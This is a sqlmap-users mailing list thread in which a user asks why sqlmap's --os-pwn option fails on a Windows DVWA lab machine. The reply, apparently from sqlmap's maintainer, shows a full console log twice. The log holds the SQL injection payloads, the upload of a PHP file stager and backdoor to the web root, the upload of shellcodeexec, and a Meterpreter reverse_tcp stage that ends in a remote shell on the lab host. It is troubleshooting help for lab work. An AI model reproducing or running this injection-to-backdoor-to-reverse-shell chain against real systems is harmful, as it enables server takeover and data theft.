sqlmap resumed the following injection point(s) from stored session: > --- > Parameter: id (GET) > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: id=1 AND 2546=2546 > > Type: error-based > Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP > BY clause > Payload: id=1 AND (SELECT 8079 FROM(SELECT > COUNT(*),CONCAT(0x7178767071,(SELECT > (ELT(8079=8079,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM > INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) > > Type: AND/OR time-based blind > Title: MySQL >= 5.0.12 AND time-based blind (SELECT) > Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xlBU) > > Type: UNION query > Title: Generic UNION query (NULL) - 3 columns > Payload: id=1 UNION ALL SELECT > NULL,NULL,CONCAT(0x7178767071,0x4d456579576479484f6370774b764245666350774a6f544b5a714c6442686644794976654154524a,0x7178767671)-- > epjZ > --- > [09:11:45] [INFO] the back-end DBMS is MySQL > web server operating system: Windows > web application technology: PHP 5.3.1, Apache 2.2.14 > back-end DBMS: MySQL 5.0 > [09:11:45] [INFO] fingerprinting the back-end DBMS operating system > [09:11:45] [INFO] the back-end DBMS operating system is Windows > how do you want to establish the tunnel? > [1] TCP: Metasploit Framework (default) > [2] ICMP: icmpsh - ICMP tunneling > > > [09:11:46] [INFO] going to use a web backdoor to establish the tunnel > which web application language does the web server support? > [1] ASP > [2] ASPX > [3] JSP > [4] PHP (default) > > > [09:11:47] [WARNING] unable to retrieve automatically the web server > document root > what do you want to use for writable directory? > [1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default) > [2] custom location(s) > [3] custom directory list file > [4] brute force search > > 1 > [09:12:02] [WARNING] unable to automatically parse any web server path > [09:12:02] [INFO] trying to upload the file stager on '/xampp/htdocs/' via > LIMIT 'LINES TERMINATED BY' method > [09:12:02] [INFO] the file stager has been successfully uploaded on > '/xampp/htdocs/' - http://192.168.146.132:80/tmpuycdj.php > [09:12:02] [INFO] the backdoor has been successfully uploaded on > '/xampp/htdocs/' - http://192.168.146.132:80/tmpbqtzu.php > [09:12:02] [INFO] creating Metasploit Framework multi-stage shellcode > which connection type do you want to use? > [1] Reverse TCP: Connect back from the database host to this machine > (default) > [2] Reverse TCP: Try to connect back from the database host to this > machine, on all ports between the specified and 65535 > [3] Reverse HTTP: Connect back from the database host to this machine > tunnelling traffic over HTTP > [4] Reverse HTTPS: Connect back from the database host to this machine > tunnelling traffic over HTTPS > [5] Bind TCP: Listen on the database host for a connection > > > what is the local address? [Enter for '192.168.146.1' (detected)] > which local port number do you want to use? [59643] > which payload do you want to use? > [1] Meterpreter (default) > [2] Shell > [3] VNC > > > [09:12:04] [INFO] creation in progress ..... done > [09:12:09] [INFO] uploading shellcodeexec to > 'C:/Windows/Temp/tmpsehply.exe' > [09:12:09] [INFO] shellcodeexec successfully uploaded > [09:12:09] [INFO] running Metasploit Framework command line interface > locally, please wait.. > > > ______________________________________________________________________________ > | > | > | METASPLOIT CYBER MISSILE COMMAND V4 > | > > |______________________________________________________________________________| > \ / / > \ . / / > x > \ / / > \ / + / > \ + / / > * / / > / . / > X / / X > / ### > / # % # > / ### > . / > . / . * . > / > * > + * > > ^ > #### __ __ __ ####### __ __ __ > #### > #### / \ / \ / \ ########### / \ / \ / \ > #### > > ################################################################################ > > ################################################################################ > # WAVE 4 ######## SCORE 31337 ################################## HIGH > FFFFFFFF # > > ################################################################################ > > http://metasploit.pro > > > =[ metasploit v4.11.8-dev-a030179 ] > + -- --=[ 1527 exploits - 880 auxiliary - 259 post ] > + -- --=[ 437 payloads - 38 encoders - 8 nops ] > + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] > > PAYLOAD => windows/meterpreter/reverse_tcp > EXITFUNC => process > LPORT => 59643 > LHOST => 192.168.146.1 > [*] Started reverse TCP handler on 192.168.146.1:59643 > [*] Starting the payload handler... > [09:12:18] [INFO] running Metasploit Framework shellcode remotely via > shellcodeexec, please wait.. > [09:12:23] [WARNING] turning off pre-connect mechanism because of > connection time out(s) > [*] Sending stage (957487 bytes) to 192.168.146.132 > > meterpreter > > > > On Fri, Apr 22, 2016 at 6:56 AM, Indra Zulkarnain <net...@gm...> > wrote: > >> hi all, >> >> i just wondering, when i tried to do --os-pwn on sqlmap in my "DVWA >> windows machine" >> >> i got an error >> >> [WARNING] unable to upload the file through the web file stager to '/tmp' >> >> i wonder is it only avaliable for linux OS ? >> >> thanks >> Indra Z >> >> -- >> --from the net with zero space-- >> >> >> ------------------------------------------------------------------------------ >> Find and fix application performance issues faster with Applications >> Manager >> Applications Manager provides deep performance insights into multiple >> tiers of >> your business applications. It resolves application problems quickly and >> reduces your MTTR. Get your free trial! >> https://ad.doubleclick.net/ddm/clk/302982198;130105516;z >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2016-04-22 07:14:02
|
$ sudo python sqlmap.py -u " http://192.168.146.132/test_environment/mysql/get_int.php?id=1" --os-pwn [sudo] password for stamparm: _ ___ ___| |_____ ___ ___ {1.0.4.21#dev} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 09:11:45 [09:11:45] [WARNING] you did not provide the local path where Metasploit Framework is installed [09:11:45] [WARNING] sqlmap is going to look for Metasploit Framework installation inside the environment path(s) [09:11:45] [INFO] Metasploit Framework has been found installed in the '/usr/bin' path [09:11:45] [INFO] resuming back-end DBMS 'mysql' [09:11:45] [INFO] testing connection to the target URL [09:11:45] [INFO] heuristics detected web page charset 'ascii' [09:11:45] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2546=2546 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1 AND (SELECT 8079 FROM(SELECT COUNT(*),CONCAT(0x7178767071,(SELECT (ELT(8079=8079,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xlBU) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7178767071,0x4d456579576479484f6370774b764245666350774a6f544b5a714c6442686644794976654154524a,0x7178767671)-- epjZ --- [09:11:45] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.1, Apache 2.2.14 back-end DBMS: MySQL 5.0 [09:11:45] [INFO] fingerprinting the back-end DBMS operating system [09:11:45] [INFO] the back-end DBMS operating system is Windows how do you want to establish the tunnel? [1] TCP: Metasploit Framework (default) [2] ICMP: icmpsh - ICMP tunneling > [09:11:46] [INFO] going to use a web backdoor to establish the tunnel which web application language does the web server support? [1] ASP [2] ASPX [3] JSP [4] PHP (default) > [09:11:47] [WARNING] unable to retrieve automatically the web server document root what do you want to use for writable directory? [1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default) [2] custom location(s) [3] custom directory list file [4] brute force search > 1 [09:12:02] [WARNING] unable to automatically parse any web server path [09:12:02] [INFO] trying to upload the file stager on '/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method [09:12:02] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://192.168.146.132:80/tmpuycdj.php [09:12:02] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://192.168.146.132:80/tmpbqtzu.php [09:12:02] [INFO] creating Metasploit Framework multi-stage shellcode which connection type do you want to use? [1] Reverse TCP: Connect back from the database host to this machine (default) [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535 [3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP [4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS [5] Bind TCP: Listen on the database host for a connection > what is the local address? [Enter for '192.168.146.1' (detected)] which local port number do you want to use? [59643] which payload do you want to use? [1] Meterpreter (default) [2] Shell [3] VNC > [09:12:04] [INFO] creation in progress ..... done [09:12:09] [INFO] uploading shellcodeexec to 'C:/Windows/Temp/tmpsehply.exe' [09:12:09] [INFO] shellcodeexec successfully uploaded [09:12:09] [INFO] running Metasploit Framework command line interface locally, please wait.. ______________________________________________________________________________ | | | METASPLOIT CYBER MISSILE COMMAND V4 | |______________________________________________________________________________| \ / / \ . / / x \ / / \ / + / \ + / / * / / / . / X / / X / ### / # % # / ### . / . / . * . / * + * ^ #### __ __ __ ####### __ __ __ #### #### / \ / \ / \ ########### / \ / \ / \ #### ################################################################################ ################################################################################ # WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF # ################################################################################ http://metasploit.pro =[ metasploit v4.11.8-dev-a030179 ] + -- --=[ 1527 exploits - 880 auxiliary - 259 post ] + -- --=[ 437 payloads - 38 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] PAYLOAD => windows/meterpreter/reverse_tcp EXITFUNC => process LPORT => 59643 LHOST => 192.168.146.1 [*] Started reverse TCP handler on 192.168.146.1:59643 [*] Starting the payload handler... [09:12:18] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait.. [09:12:23] [WARNING] turning off pre-connect mechanism because of connection time out(s) [*] Sending stage (957487 bytes) to 192.168.146.132 meterpreter > On Fri, Apr 22, 2016 at 6:56 AM, Indra Zulkarnain <net...@gm...> wrote: > hi all, > > i just wondering, when i tried to do --os-pwn on sqlmap in my "DVWA > windows machine" > > i got an error > > [WARNING] unable to upload the file through the web file stager to '/tmp' > > i wonder is it only avaliable for linux OS ? > > thanks > Indra Z > > -- > --from the net with zero space-- > > > ------------------------------------------------------------------------------ > Find and fix application performance issues faster with Applications > Manager > Applications Manager provides deep performance insights into multiple > tiers of > your business applications. It resolves application problems quickly and > reduces your MTTR. Get your free trial! > https://ad.doubleclick.net/ddm/clk/302982198;130105516;z > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |